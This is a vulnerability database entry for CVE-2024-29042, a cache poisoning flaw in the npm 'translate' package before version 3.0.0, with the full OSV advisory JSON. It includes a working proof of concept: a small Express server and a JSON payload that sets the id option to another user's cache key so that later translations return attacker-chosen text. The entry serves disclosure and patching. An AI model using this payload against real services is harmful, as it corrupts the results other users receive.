GHSA-882J-4VJ5-7VMJ

Vulnerability from github – Published: 2024-03-22 16:57 – Updated: 2024-03-22 20:02
VLAI?
Summary
Cache Poisoning Vulnerability
Details

Summary

An attacker controlling the second variable of the translate function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users.

Details

The opt.id parameter allows the overwriting of the cache key. If an attacker sets the id variable to the cache key that would be generated by another user, they can choose the response that user gets served.

PoC

Take the following simple server allowing users to supply text and the language to translate to.

import translate from "translate";
import express from 'express';

const app = express();
app.use(express.json());

app.post('/translate', async (req, res) => {
  const { text, language } = req.body;
  const result = await translate(text, language);
  return res.json(result);
});

const port = 3000;
app.listen(port, () => {
  console.log(`Server is running on port ${port}`);
});

We can send the following request to poison the cache:

{"text":"I hate you", "language":{"to":"nl","id":"undefined:en:nl:google:I love you"}}

Poisoning the cache

Now, any user that attempts to translate "I love you" to Dutch, will get "I hate you" in Dutch as the response. The victim gets our poisoned data

Impact

An attacker can control the results other users may get

Severity ?
5.3 (Medium)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "npm",
        "name": "translate"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2024-29042"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-20"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2024-03-22T16:57:21Z",
    "nvd_published_at": "2024-03-22T17:15:07Z",
    "severity": "MODERATE"
  },
  "details": "### Summary\nAn attacker controlling the second variable of the `translate` function is able to perform a cache poisoning attack. They can change the outcome of translation requests made by subsequent users.\n\n### Details\nThe `opt.id` parameter allows the overwriting of the cache key. If an attacker sets the `id` variable to the cache key that would be generated by another user, they can choose the response that user gets served.\n\n### PoC\nTake the following simple server allowing users to supply text and the language to translate to.\n```javascript\nimport translate from \"translate\";\nimport express from \u0027express\u0027;\n\nconst app = express();\napp.use(express.json());\n\napp.post(\u0027/translate\u0027, async (req, res) =\u003e {\n  const { text, language } = req.body;\n  const result = await translate(text, language);\n  return res.json(result);\n});\n\nconst port = 3000;\napp.listen(port, () =\u003e {\n  console.log(`Server is running on port ${port}`);\n});\n```\n\nWe can send the following request to poison the cache:\n```\n{\"text\":\"I hate you\", \"language\":{\"to\":\"nl\",\"id\":\"undefined:en:nl:google:I love you\"}}\n```\n![Poisoning the cache](https://user-images.githubusercontent.com/44903767/285421743-ccfa3d9d-24cf-47b7-b805-0e4034cec82e.png)\n\nNow, any user that attempts to translate \"I love you\" to Dutch, will get \"I hate you\" in Dutch as the response.\n![The victim gets our poisoned data](https://user-images.githubusercontent.com/44903767/285422033-b3853ca2-8a5a-4875-91e8-ba2ef0258bc6.png)\n\n\n### Impact\nAn attacker can control the results other users may get\n",
  "id": "GHSA-882j-4vj5-7vmj",
  "modified": "2024-03-22T20:02:15Z",
  "published": "2024-03-22T16:57:21Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/franciscop/translate/security/advisories/GHSA-882j-4vj5-7vmj"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-29042"
    },
    {
      "type": "WEB",
      "url": "https://github.com/franciscop/translate/commit/7a2bf8b9f05f7c45c09683973ef4d8e995804aa4"
    },
    {
      "type": "WEB",
      "url": "https://github.com/franciscop/translate/commit/cc1ba03078102f83e0503a96f1a081489bb865d3"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/franciscop/translate"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Cache Poisoning Vulnerability"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.